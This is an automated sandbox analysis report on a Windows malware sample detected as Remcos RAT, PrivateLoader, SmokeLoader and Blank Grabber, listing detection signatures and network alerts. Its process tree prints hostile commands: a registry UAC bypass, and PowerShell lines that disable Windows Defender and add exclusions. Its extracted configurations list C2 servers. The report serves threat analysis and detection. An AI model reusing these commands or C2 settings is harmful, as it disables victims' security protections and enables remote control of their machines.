Edit tour
Windows
Analysis Report
Og1SeeXcB2.exe
Overview
General Information
Sample name: | Og1SeeXcB2.exerenamed because original name is a hash value |
Original sample name: | 150e9ffdac7f2361c2efa735929aa268.exe |
Analysis ID: | 1438370 |
MD5: | 150e9ffdac7f2361c2efa735929aa268 |
SHA1: | 3ed43e5fb5cd202d91fe31c4a0f8674e5fdb0759 |
SHA256: | d54259b35ece6e39b159317128bfd62f88abbaadd92537379c4bae078e82fe69 |
Tags: | exe |
Infos: | |
Detection
Remcos, Blank Grabber, PrivateLoader, SmokeLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Benign windows process drops PE files
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Fodhelper UAC Bypass
Sigma detected: Remcos
Sigma detected: Search for Antivirus process
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
UAC bypass detected (Fodhelper)
Yara detected Blank Grabber
Yara detected PrivateLoader
Yara detected Remcos RAT
Yara detected SmokeLoader
Yara detected UAC Bypass using CMSTP
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Creates autostart registry keys with suspicious names
Drops PE files with a suspicious file extension
Found API chain indicative of debugger detection
Found API chain indicative of sandbox detection
Found many strings related to Crypto-Wallets (likely being stolen)
Found pyInstaller with non standard icon
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies Windows Defender protection settings
Removes signatures from Windows Defender
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Suspicious Script Execution From Temp Folder
Uses cmd line tools excessively to alter registry or file data
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Writes to foreign memory regions
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
OS version to string mapping found (often used in BOTs)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Powershell Defender Exclusion
Sigma detected: Remote Thread Creation By Uncommon Source Image
Sigma detected: Suspicious Reg Add Open Command
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
- Og1SeeXcB2.exe (PID: 6612 cmdline:
"C:\Users\ user\Deskt op\Og1SeeX cB2.exe" MD5: 150E9FFDAC7F2361C2EFA735929AA268) - cmd.exe (PID: 6800 cmdline:
"C:\Window s\System32 \cmd.exe" /k move Hw y Hwy.cmd & Hwy.cmd & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 6820 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tasklist.exe (PID: 7012 cmdline:
tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1) - findstr.exe (PID: 2004 cmdline:
findstr /I "wrsa.exe opssvc.ex e" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E) - tasklist.exe (PID: 7128 cmdline:
tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1) - findstr.exe (PID: 7136 cmdline:
findstr /I "avastui. exe avgui. exe nswscs vc.exe sop hoshealth. exe" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E) - cmd.exe (PID: 4080 cmdline:
cmd /c md 1181 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - findstr.exe (PID: 1432 cmdline:
findstr /V "peruless erpalaceco rresponden ce" Video MD5: F1D4BE0E99EC734376FDE474A8D4EA3E) - cmd.exe (PID: 7148 cmdline:
cmd /c cop y /b Outlo ok + Impor ts 1181\U MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - End.pif (PID: 2120 cmdline:
1181\End.p if 1181\U MD5: 62D09F076E6E0240548C2F837536A46A) - End.pif (PID: 7072 cmdline:
C:\Users\u ser\AppDat a\Local\Mi crosoft\Wi ndows\INet Cache\1181 \End.pif MD5: 62D09F076E6E0240548C2F837536A46A) - End.pif (PID: 7068 cmdline:
C:\Users\u ser\AppDat a\Local\Mi crosoft\Wi ndows\INet Cache\1181 \End.pif MD5: 62D09F076E6E0240548C2F837536A46A) - End.pif (PID: 6992 cmdline:
C:\Users\u ser\AppDat a\Local\Mi crosoft\Wi ndows\INet Cache\1181 \End.pif MD5: 62D09F076E6E0240548C2F837536A46A) - explorer.exe (PID: 2580 cmdline:
C:\Windows \Explorer. EXE MD5: 662F4F92FDE3557E86D110526BB578D5) - DE5A.exe (PID: 4348 cmdline:
C:\Users\u ser\AppDat a\Local\Te mp\DE5A.ex e MD5: CB769D049C4541F926F5D6B8D1FF5929) - DE5A.exe (PID: 3468 cmdline:
C:\Users\u ser\AppDat a\Local\Te mp\DE5A.ex e MD5: CB769D049C4541F926F5D6B8D1FF5929) - cmd.exe (PID: 1612 cmdline:
C:\Windows \system32\ cmd.exe /c "reg add hkcu\Softw are\Classe s\ms-setti ngs\shell\ open\comma nd /d "C:\ Users\user \AppData\L ocal\Temp\ DE5A.exe" /f" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 7040 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - reg.exe (PID: 1888 cmdline:
reg add hk cu\Softwar e\Classes\ ms-setting s\shell\op en\command /d "C:\Us ers\user\A ppData\Loc al\Temp\DE 5A.exe" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4) - cmd.exe (PID: 3796 cmdline:
C:\Windows \system32\ cmd.exe /c "reg add hkcu\Softw are\Classe s\ms-setti ngs\shell\ open\comma nd /v "Del egateExecu te" /f" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 4336 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - reg.exe (PID: 2516 cmdline:
reg add hk cu\Softwar e\Classes\ ms-setting s\shell\op en\command /v "Deleg ateExecute " /f MD5: 227F63E1D9008B36BDBCC4B397780BE4) - cmd.exe (PID: 5592 cmdline:
C:\Windows \system32\ cmd.exe /c "wevtutil qe "Micro soft-Windo ws-Windows Defender/ Operationa l" /f:text " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6072 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - wevtutil.exe (PID: 5184 cmdline:
wevtutil q e "Microso ft-Windows -Windows D efender/Op erational" /f:text MD5: 1AAE26BD68B911D0420626A27070EB8D) - cmd.exe (PID: 1448 cmdline:
C:\Windows \system32\ cmd.exe /c "computer defaults - -nouacbypa ss" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 1904 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - ComputerDefaults.exe (PID: 412 cmdline:
computerde faults --n ouacbypass MD5: D25A9E160E3B74EF2242023726F15416) - ComputerDefaults.exe (PID: 1284 cmdline:
"C:\Window s\system32 \ComputerD efaults.ex e" --nouac bypass MD5: D25A9E160E3B74EF2242023726F15416) - ComputerDefaults.exe (PID: 1988 cmdline:
"C:\Window s\system32 \ComputerD efaults.ex e" --nouac bypass MD5: D25A9E160E3B74EF2242023726F15416) - DE5A.exe (PID: 3588 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\DE5A.e xe" MD5: CB769D049C4541F926F5D6B8D1FF5929) - DE5A.exe (PID: 5632 cmdline:
"C:\Users\ user\AppDa ta\Local\T emp\DE5A.e xe" MD5: CB769D049C4541F926F5D6B8D1FF5929) - cmd.exe (PID: 2312 cmdline:
C:\Windows \system32\ cmd.exe /c "powershe ll -Comman d Add-MpPr eference - ExclusionP ath 'C:\Us ers\user\A ppData\Loc al\Temp\DE 5A.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 1804 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 4908 cmdline:
powershell -Command Add-MpPref erence -Ex clusionPat h 'C:\User s\user\App Data\Local \Temp\DE5A .exe' MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 2116 cmdline:
C:\Windows \system32\ cmd.exe /c "powershe ll Set-MpP reference -DisableIn trusionPre ventionSys tem $true -DisableIO AVProtecti on $true - DisableRea ltimeMonit oring $tru e -Disable ScriptScan ning $true -EnableCo ntrolledFo lderAccess Disabled -EnableNet workProtec tion Audit Mode -Forc e -MAPSRep orting Dis abled -Sub mitSamples Consent Ne verSend && powershel l Set-MpPr eference - SubmitSamp lesConsent 2 & "%Pro gramFiles% \Windows D efender\Mp CmdRun.exe " -RemoveD efinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 5896 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 4928 cmdline:
powershell Set-MpPre ference -D isableIntr usionPreve ntionSyste m $true -D isableIOAV Protection $true -Di sableRealt imeMonitor ing $true -DisableSc riptScanni ng $true - EnableCont rolledFold erAccess D isabled -E nableNetwo rkProtecti on AuditMo de -Force -MAPSRepor ting Disab led -Submi tSamplesCo nsent Neve rSend MD5: 04029E121A0CFA5991749937DD22A1D9) - MpCmdRun.exe (PID: 3760 cmdline:
"C:\Progra m Files\Wi ndows Defe nder\MpCmd Run.exe" - RemoveDefi nitions -A ll MD5: B3676839B2EE96983F9ED735CD044159) - cmd.exe (PID: 332 cmdline:
C:\Windows \system32\ cmd.exe /c "powershe ll -Comman d Add-MpPr eference - ExclusionP ath 'C:\Us ers\user\A ppData\Loc al\Temp\bo und.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 5476 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 4416 cmdline:
powershell -Command Add-MpPref erence -Ex clusionPat h 'C:\User s\user\App Data\Local \Temp\boun d.exe' MD5: 04029E121A0CFA5991749937DD22A1D9) - WmiPrvSE.exe (PID: 5180 cmdline:
C:\Windows \system32\ wbem\wmipr vse.exe -s ecured -Em bedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51) - cmd.exe (PID: 5720 cmdline:
C:\Windows \system32\ cmd.exe /c "start bo und.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 2484 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - bound.exe (PID: 1860 cmdline:
bound.exe MD5: E5C79A33139A13DAAC52DA8DD0ABFC68) - WindowsUpdateServices.exe (PID: 6948 cmdline:
"C:\Users\ user\AppDa ta\Roaming \WindowsUp dateServic es\Windows UpdateServ ices.exe" MD5: E5C79A33139A13DAAC52DA8DD0ABFC68) - iexplore.exe (PID: 2004 cmdline:
"c:\progra m files (x 86)\intern et explore r\iexplore .exe" MD5: 6F0F06D6AB125A99E43335427066A4A1) - cmd.exe (PID: 5304 cmdline:
C:\Windows \system32\ cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 3844 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tasklist.exe (PID: 5856 cmdline:
tasklist / FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA) - cmd.exe (PID: 5084 cmdline:
C:\Windows \system32\ cmd.exe /c "wmic csp roduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 3608 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - WMIC.exe (PID: 6460 cmdline:
wmic cspro duct get u uid MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - cmd.exe (PID: 1312 cmdline:
C:\Windows \system32\ cmd.exe /c "wevtutil qe "Micro soft-Windo ws-Windows Defender/ Operationa l" /f:text " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 2536 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - wevtutil.exe (PID: 1016 cmdline:
wevtutil q e "Microso ft-Windows -Windows D efender/Op erational" /f:text MD5: 1AAE26BD68B911D0420626A27070EB8D) - cmd.exe (PID: 5840 cmdline:
C:\Windows \system32\ cmd.exe /c "reg dele te hkcu\So ftware\Cla sses\ms-se ttings /f" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 1188 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - reg.exe (PID: 5212 cmdline:
reg delete hkcu\Soft ware\Class es\ms-sett ings /f MD5: 227F63E1D9008B36BDBCC4B397780BE4) - PING.EXE (PID: 3548 cmdline:
ping -n 5 127.0.0.1 MD5: B3624DD758CCECF93A1226CEF252CA12) - conhost.exe (PID: 7024 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- wsruwii (PID: 1028 cmdline:
C:\Users\u ser\AppDat a\Roaming\ wsruwii MD5: 62D09F076E6E0240548C2F837536A46A)
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Remcos, RemcosRAT | Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity. |
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
PrivateLoader | According to sekoia, PrivateLoader is a modular malware whose main capability is to download and execute one or several payloads. The loader implements anti-analysis techniques, fingerprints the compromised host and reports statistics to its C2 server. | No Attribution |
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
SmokeLoader | The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body. |
{"Version": 2022, "C2 list": ["http://cellc.org/tmp/index.php", "http://h-c-v.ru/tmp/index.php", "http://icebrasilpr.com/tmp/index.php", "http://piratia-life.ru/tmp/index.php", "http://piratia.su/tmp/index.php"]}
{"Host:Port:Password": "193.149.176.178:2404:1", "Assigned name": "WindowsUpdateServices", "Connect interval": "1", "Install flag": "Enable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "AppData", "Copy file": "WindowsUpdateServices.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-ZZZU66", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security | ||
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
JoeSecurity_PrivateLoader | Yara detected PrivateLoader | Joe Security | ||
Windows_Trojan_Remcos_b296e965 | unknown | unknown |
| |
Click to see the 3 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
Windows_Trojan_Remcos_b296e965 | unknown | unknown |
| |
JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security | ||
JoeSecurity_BlankGrabber | Yara detected Blank Grabber | Joe Security | ||
Click to see the 65 entries |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security | ||
JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security | ||
JoeSecurity_PrivateLoader | Yara detected PrivateLoader | Joe Security | ||
Windows_Trojan_Remcos_b296e965 | unknown | unknown |
| |
REMCOS_RAT_variants | unknown | unknown |
| |
Click to see the 43 entries |
Privilege Escalation |
---|
Source: | Author: Joe Security: |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: |
Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): |
Source: | Author: Max Altgelt (Nextron Systems): |
Source: | Author: Florian Roth (Nextron Systems): |
Source: | Author: Perez Diego (@darkquassar), oscd.community: |
Source: | Author: frack113: |
Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Author: Joe Security: |
Stealing of Sensitive Information |
---|
Source: | Author: Joe Security: |
Timestamp: | 05/08/24-16:41:19.549710 |
SID: | 2039103 |
Source Port: | 49744 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 05/08/24-16:41:22.482663 |
SID: | 2039103 |
Source Port: | 49747 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 05/08/24-16:41:03.912735 |
SID: | 2039103 |
Source Port: | 49739 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 05/08/24-16:41:06.812550 |
SID: | 2039103 |
Source Port: | 49741 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 05/08/24-16:41:21.026860 |
SID: | 2039103 |
Source Port: | 49745 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 05/08/24-16:41:25.414325 |
SID: | 2039103 |
Source Port: | 49749 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 05/08/24-16:41:05.348624 |
SID: | 2039103 |
Source Port: | 49740 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 05/08/24-16:41:08.297665 |
SID: | 2039103 |
Source Port: | 49742 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Timestamp: | 05/08/24-16:41:23.944554 |
SID: | 2039103 |
Source Port: | 49748 |
Destination Port: | 80 |
Protocol: | TCP |
Classtype: | A Network Trojan was detected |
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | URL Reputation: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: |
Source: | Malware Configuration Extractor: | ||
Source: | Malware Configuration Extractor: |
Source: | ReversingLabs: |
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Source: | Joe Sandbox ML: |
Source: | Binary or memory string: | memstr_3027aa14-7 |
Exploits |
---|
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: | ||
Source: | File source: |
Privilege Escalation |
---|
Source: | Registry value created: | ||
Source: | Registry value created: |
Source: | Static PE information: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Static PE information: |
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: | ||
Source: | Binary string: |